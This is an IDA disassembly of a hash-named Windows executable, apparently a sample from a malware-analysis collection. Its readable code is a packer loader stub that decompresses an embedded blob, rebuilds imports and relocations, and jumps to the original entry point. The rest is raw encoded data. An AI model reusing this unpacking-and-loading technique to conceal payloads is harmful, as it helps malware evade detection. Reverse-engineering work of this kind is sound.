;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 992B75215CDA0D1024C3F450BDCBBE36
; File Name : u:\work\992b75215cda0d1024c3f450bdcbbe36_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00085000 ( 544768.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00000200
; Flags D00000E0: Text Data Bss Shareable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
seg000 segment para public 'BSS' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd 20ED4h dup(?)
db 3 dup(?)
byte_484B53 db ? ; CODE XREF: start+272�j
dd 52Bh dup(?)
seg000 ends
; Section 2. (virtual address 00086000)
; Virtual size : 0001B124 ( 110884.)
; Section size in file : 00019E00 ( 105984.)
; Offset to raw data for section: 00000200
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg001 segment para public 'CODE' use32
assume cs:seg001
;org 486000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd 906h, 0
dd 85000h, 0
dd 86153h, 16h dup(0)
dd 2, 0C8h, 4 dup(0)
dd 1000h, 0
dd 19373h, 3 dup(0)
seg001 ends
;
; Imports from KERNEL32.DLL
;
; ===========================================================================
; Segment type: Externs
; _idata
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword
; BOOL __stdcall VirtualProtect(LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect)
extrn VirtualProtect:dword
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAlloc:dword
; BOOL __stdcall VirtualFree(LPVOID lpAddress,SIZE_T dwSize,DWORD dwFreeType)
extrn VirtualFree:dword
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg003 segment para public 'CODE' use32
assume cs:seg003
;org 4860B8h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd 3 dup(0)
dd 860E0h, 8609Ch, 5 dup(0)
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 65470000h, 6F725074h, 64644163h
dd 73736572h, 56000000h, 75747269h, 72506C61h, 6365746Fh
dd 74h, 74726956h, 416C6175h, 636F6C6Ch, 56000000h, 75747269h
dd 72466C61h, 6565h, 69784500h, 6F725074h, 73736563h, 0D2000000h
dd 2A877959h
db 4Dh, 37h, 0B4h
; =============== S U B R O U T I N E =======================================
public start
start proc near
; FUNCTION CHUNK AT 00486513 SIZE 00000009 BYTES
pushf
pusha
call $+5
pop ebp
sub ebp, 7
lea ecx, [ebp-0D7h]
cmp byte ptr [ecx], 1
jz loc_4863AF
mov byte ptr [ecx], 1
mov eax, ebp
sub eax, [ebp-143h]
mov [ebp-143h], eax
add [ebp-113h], eax
lea esi, [ebp-0CFh]
add [esi], eax
push ebp
push esi
push 40h
push 1000h
push 1000h
push 0
call dword ptr [ebp-0ABh]
test eax, eax
jz loc_486513
mov [ebp-11Bh], eax
call $+5
pop ebx
mov ecx, 367h
add ebx, ecx
push eax
push ebx
call sub_486474
pop esi
pop ebp
mov esi, [esi]
mov edi, ebp
add edi, [ebp-153h]
mov ebx, edi
cmp dword ptr [edi], 0
jnz short loc_4861E1
add edi, 4
mov ecx, 0
jmp short loc_4861F7
; ---------------------------------------------------------------------------
loc_4861E1: ; CODE XREF: start+82�j
mov ecx, 1
add edi, [ebx]
add ebx, 4
loc_4861EB: ; CODE XREF: start+CF�j
cmp dword ptr [ebx], 0
jz short loc_486224
add [ebx], edx
mov esi, [ebx]
add edi, [ebx+4]
loc_4861F7: ; CODE XREF: start+8C�j
push edi
push ecx
push ebx
push dword ptr [ebp-0A7h]
push dword ptr [ebp-0ABh]
mov edx, esi
mov ecx, edi
mov eax, [ebp-11Bh]
add eax, 5AAh
call eax
pop ebx
pop ecx
pop edi
cmp ecx, 0
jz short loc_486224
add ebx, 8
jmp short loc_4861EB
; ---------------------------------------------------------------------------
loc_486224: ; CODE XREF: start+9B�j start+CA�j
push 8000h
push 0
push dword ptr [ebp-11Bh]
call dword ptr [ebp-0A7h]
lea esi, [ebp-113h]
mov ecx, [esi+8]
lea edx, [esi+10h]
mov esi, [esi]
mov edi, esi
cmp ecx, 0
jz short loc_48628B
loc_48624C: ; CODE XREF: start+100�j start+10E�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_486251: ; CODE XREF: start+136�j
cmp al, 1
ja short loc_48624C
mov eax, [edi]
cmp byte ptr [edx+1], 0
jz short loc_486271
mov bl, [edx]
cmp [edi], bl
jnz short loc_48624C
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
jmp short loc_48627B
; ---------------------------------------------------------------------------
loc_486271: ; CODE XREF: start+108�j
mov bl, [edi+4]
xchg al, ah
rol eax, 10h
xchg al, ah
loc_48627B: ; CODE XREF: start+11C�j
sub eax, edi
add eax, esi
mov [edi], eax
add edi, 5
sub bl, 0E8h
mov eax, ebx
loop loc_486251
loc_48628B: ; CODE XREF: start+F7�j
call sub_4863CA
lea ecx, [ebp-0FFh]
mov eax, [ecx+8]
cmp eax, 0
jz loc_486323
mov esi, edx
sub esi, [ecx+10h]
jz short loc_486323
mov [ecx+10h], esi
lea esi, [ebp-0CFh]
mov esi, [esi]
lea ebx, [esi-4]
mov eax, [ecx]
cmp eax, 1
jz short loc_4862C8
mov edi, edx
add edi, [ecx+8]
mov ecx, [ecx+10h]
jmp short loc_4862D0
; ---------------------------------------------------------------------------
loc_4862C8: ; CODE XREF: start+169�j
mov edi, esi
add edi, [ecx+8]
mov ecx, [ecx+10h]
loc_4862D0: ; CODE XREF: start+173�j start+18E�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_4862F9
cmp al, 0EFh
ja short loc_4862E3
loc_4862DD: ; CODE XREF: start+19D�j start+1A4�j
add ebx, eax
add [ebx], ecx
jmp short loc_4862D0
; ---------------------------------------------------------------------------
loc_4862E3: ; CODE XREF: start+188�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
or eax, eax
jnz short loc_4862DD
mov eax, [edi]
add edi, 4
jmp short loc_4862DD
; ---------------------------------------------------------------------------
loc_4862F9: ; CODE XREF: start+184�j
xor ebx, ebx
xchg edi, esi
mov eax, [esi]
cmp eax, 0
jz short loc_486323
loc_486304: ; CODE XREF: start+1BC�j
lodsd
or eax, eax
jz short loc_486311
add ebx, eax
add [edi+ebx], cx
jmp short loc_486304
; ---------------------------------------------------------------------------
loc_486311: ; CODE XREF: start+1B4�j
xor ebx, ebx
shr ecx, 10h
loc_486316: ; CODE XREF: start+1CE�j
lodsd
or eax, eax
jz short loc_486323
add ebx, eax
add [edi+ebx], cx
jmp short loc_486316
; ---------------------------------------------------------------------------
loc_486323: ; CODE XREF: start+149�j start+154�j ...
lea esi, [ebp-143h]
mov edx, [esi]
lea esi, [ebp-0E7h]
mov al, [esi]
cmp al, 1
jnz short loc_486376
add edx, [esi+4]
push esi
push edx
push esi
push 4
push 100h
push edx
call dword ptr [ebp-0AFh]
pop edi
pop esi
cmp eax, 1
jnz loc_486513
add esi, 8
mov ecx, 8
rep movsb
sub esi, 0Ch
sub edi, 8
push esi
push dword ptr [esi-4]
push 100h
push edi
call dword ptr [ebp-0AFh]
loc_486376: ; CODE XREF: start+1E2�j
push ebp
pop ebx
sub ebx, 8
xor ecx, ecx
mov cl, [ebx]
cmp cl, 0
jz short loc_4863AF
inc ebx
lea esi, [ebp-143h]
mov edx, [esi]
loc_486390: ; CODE XREF: start+25A�j
push esi
push ecx
push ebx
push edx
push esi
push dword ptr [ebx]
push dword ptr [ebx+4]
mov eax, [ebx+8]
add eax, edx
push eax
call dword ptr [ebp-0AFh]
pop edx
pop ebx
pop ecx
pop esi
add ebx, 0Ch
loop loc_486390
loc_4863AF: ; CODE XREF: start+14�j start+232�j
mov eax, 0
cmp eax, 0
jz short loc_4863C3
popa
popf
mov eax, 1
retn 0Ch
; ---------------------------------------------------------------------------
loc_4863C3: ; CODE XREF: start+264�j
popa
popf
jmp near ptr byte_484B53
start endp
; =============== S U B R O U T I N E =======================================
sub_4863CA proc near ; CODE XREF: start:loc_48628B�p
mov esi, [ebp-14Bh]
or esi, esi
jz loc_48646F
mov edx, [ebp-143h]
add esi, edx
loc_4863E0: ; CODE XREF: sub_4863CA+61�j
cmp dword ptr [esi], 0
jnz short loc_4863F3
cmp dword ptr [esi+4], 0
jnz short loc_4863F3
cmp dword ptr [esi+8], 0
jnz short loc_4863F3
jmp short loc_48646D
; ---------------------------------------------------------------------------
loc_4863F3: ; CODE XREF: sub_4863CA+19�j
; sub_4863CA+1F�j ...
mov ebx, [esi+8]
add ebx, edx
push ebx
push edx
push esi
lea edi, [ebp-73h]
add edi, [esi+4]
add esi, 0Ch
push edi
call dword ptr [ebp-0B7h]
pop edi
pop edx
pop ebx
cmp eax, 0
jz short loc_48646F
mov [ebp-13Bh], eax
add edi, [esi]
add esi, 4
loc_486421: ; CODE XREF: sub_4863CA+A1�j
xor ecx, ecx
mov cl, [esi]
cmp ecx, 0
jnz short loc_48642D
inc esi
jmp short loc_4863E0
; ---------------------------------------------------------------------------
loc_48642D: ; CODE XREF: sub_4863CA+5E�j
mov eax, edi
add edi, ecx
push edx
push ebx
push eax
cmp byte ptr [eax], 0FFh
jnz short loc_486441
inc eax
mov eax, [eax]
and eax, 7FFFFFFFh
loc_486441: ; CODE XREF: sub_4863CA+6D�j
mov cl, [edi]
mov byte ptr [edi], 0
push ecx
push eax
push dword ptr [ebp-13Bh]
call dword ptr [ebp-0B3h]
pop ecx
pop edx
pop ebx
pop edx
cmp eax, 0
jz short loc_48646F
mov [edi], cl
mov [esi-4], eax
push dword ptr [esi-4]
pop dword ptr [ebx]
add ebx, 4
inc esi
jmp short loc_486421
; ---------------------------------------------------------------------------
loc_48646D: ; CODE XREF: sub_4863CA+27�j
clc
retn
; ---------------------------------------------------------------------------
loc_48646F: ; CODE XREF: sub_4863CA+8�j
; sub_4863CA+4A�j ...
jmp loc_486513
sub_4863CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_486474 proc near ; CODE XREF: start+6C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0048650F SIZE 00000004 BYTES
push ebp
mov ebp, esp
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
cld
mov dl, 80h
loc_486480: ; CODE XREF: sub_486474+12�j
movsb
loc_486481: ; CODE XREF: sub_486474+34�j
; sub_486474+7D�j
call sub_4864F3
jnb short loc_486480
xor ecx, ecx
call sub_4864F3
jnb short loc_4864AA
xor eax, eax
call sub_4864F3
jnb short loc_4864BB
mov al, 10h
loc_48649C: ; CODE XREF: sub_486474+2F�j
call sub_4864F3
adc al, al
jnb short loc_48649C
jnz short loc_4864E8
stosb
jmp short loc_486481
; ---------------------------------------------------------------------------
loc_4864AA: ; CODE XREF: sub_486474+1B�j
call sub_4864FF
dec ecx
loop loc_4864C7
mov eax, ebp
call sub_4864FD
jmp short loc_4864E9
; ---------------------------------------------------------------------------
loc_4864BB: ; CODE XREF: sub_486474+24�j
lodsb
shr eax, 1
jz short loc_48650F
adc ecx, 2
mov ebp, eax
jmp short loc_4864E9
; ---------------------------------------------------------------------------
loc_4864C7: ; CODE XREF: sub_486474+3C�j
xchg eax, ecx
dec eax
shl eax, 8
lodsb
mov ebp, eax
call sub_4864FD
cmp eax, 7D00h
jnb short loc_4864E7
cmp eax, 500h
jnb short loc_4864E8
cmp eax, 7Fh
ja short loc_4864E9
loc_4864E7: ; CODE XREF: sub_486474+65�j
inc ecx
loc_4864E8: ; CODE XREF: sub_486474+31�j
; sub_486474+6C�j
inc ecx
loc_4864E9: ; CODE XREF: sub_486474+45�j
; sub_486474+51�j ...
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short loc_486481
sub_486474 endp
; =============== S U B R O U T I N E =======================================
sub_4864F3 proc near ; CODE XREF: sub_486474:loc_486481�p
; sub_486474+16�p ...
add dl, dl
jnz short locret_4864FC
mov dl, [esi]
inc esi
adc dl, dl
locret_4864FC: ; CODE XREF: sub_4864F3+2�j
retn
sub_4864F3 endp
; =============== S U B R O U T I N E =======================================
sub_4864FD proc near ; CODE XREF: sub_486474+40�p
; sub_486474+5B�p
xor ecx, ecx
sub_4864FD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4864FF proc near ; CODE XREF: sub_486474:loc_4864AA�p
inc ecx
loc_486500: ; CODE XREF: sub_4864FF+D�j
call sub_4864F3
adc ecx, ecx
call sub_4864F3
jb short loc_486500
retn
sub_4864FF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_486474
loc_48650F: ; CODE XREF: sub_486474+4A�j
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_486474
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_486513: ; CODE XREF: start+51�j start+1FD�j ...
push 0
call dword ptr [ebp-0A3h]
retn
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
inc dword ptr [eax]
mov edx, [ecx]
cmp edx, [ecx+4]
jnz short loc_48652F
mov dword ptr [ecx+eax*2], 2300110h
or al, 0FFh
retn
; ---------------------------------------------------------------------------
loc_48652F: ; CODE XREF: seg003:00486523�j
pop es
mov al, [edx]
inc edx
mov [ecx], edx
pusha
mov eax, [esp+4]
sbb al, 83h
popa
adc [ebx], dh
or [ebx+eax*4], cl
push esi
push ds
and [ebx], al
rol byte ptr [ecx+49h], 1
or bh, bh
push 5
jmp short loc_48655E
; ---------------------------------------------------------------------------
db 58h
dd 39C9E85Eh, 0CE48B02h, 0C0B6000Fh
db 0C1h, 0E2h
; ---------------------------------------------------------------------------
loc_48655E: ; CODE XREF: seg003:0048654D�j
or [ebx], cl
retn 3E4Eh
; ---------------------------------------------------------------------------
db 89h
dd 0EA750F41h, 40E5Eh, 718B5653h, 0DB330708h, 8057D285h
dd 2C7E0C79h, 0EA1C5576h, 0E380EED1h, 572FE3Bh, 1D83E82Bh
dd 778101CBh, 107360C5h, 81AE6C1h, 848985E8h, 0F800E741h
dd 5DD8754Dh, 5F628967h, 1C5E7A4Ch, 0B35BC38Bh, 4F97F28Ch
dd 0B70F5761h, 0C1C2DC39h, 1E0BE83Ch, 7E00C7AFh, 73F83B0Ch
dd 46893140h, 0F566C0BCh, 0D0348E01h, 98F01EBFh, 0C1FA2Bh
dd 0F80305FFh, 81398966h, 5CA87E7Fh, 0CE148B19h, 889F2AE8h
dd 1DE1644Eh, 0F166BA38h, 0EE072DFh, 0D02B42EBh, 566DF84Fh
dd 0A06FD789h, 0AD20C8Fh, 50C1E6D0h, 0DFC29EEAh, 0E742A386h
dd 40021FFEh, 81C35E5Fh, 5351ECD6h, 0DA3E16BBh, 0E8DB8594h
dd 1A7EF901h, 40FC5D89h, 8D0855B2h, 0CE63470h, 3FE83E18h
dd 0E6C603FDh, 75FC0C4Dh, 42C25EEBh, 0D3CB8B02h, 45B5FE2h
dd 191F95C9h, 0DD89763Ah, 57309CF8h, 3942FFC3h, 0D98BC97Dh
dd 7EFCA8FBh, 78566520h, 0C420312h, 2385E81Eh, 14D0CFBDh
dd 0E003D306h, 47FC4509h, 7C48123Bh, 14151BE2h, 61C98824h
dd 0E899F26Dh, 4940ECDAh, 0E8D3E46Eh, 0BABCF54h, 493DC638h
dd 0EA7C14BEh, 0A05B2B9Fh, 9C195035h, 5294FCD2h, 751BC443h
dd 0D0D1B808h, 0EEC1D865h, 468D070Eh, 26E0CF01h, 1B76C303h
dd 7396E847h, 0D80BDBD0h, 75F03B02h, 0A1FB811Ch, 1AEBD340h
dd 1BB657B2h, 0A276E822h, 99D88B59h, 0B88AE61Ch, 6585C38Ah
dd 0FA820E56h, 7CE8F147h, 0C0138541h, 2A461675h, 3AC570Ch
dd 8D036A04h, 5AB0304Ch, 31C7DCE8h, 4EC03BEBh, 0F8D78B02h
dd 5724A832h, 4B1B6575h, 8C242210h, 4E919F0Dh, 0C08301B5h
dd 6A11EB08h, 48EF840h, 0A213A102h, 0D2D2100Ch, 4ABE2C67h
dd 813F938h, 41F1544Eh, 0C8030C4Dh, 70473324h, 52A4F1B8h
dd 0C9283D1Ah, 4DCCEBDCh, 0E806C8F4h, 10E6E528h, 661AD6D2h
dd 0F84D414Bh, 20EC0690h, 0D3E403F0h, 73605E7h, 0DB325A05h
dd 0CE1C4F4Ah, 604D390Ch, 2E106055h, 6A0873DCh, 0E958020Dh
dd 6A64h dup(?)
seg003 ends
end start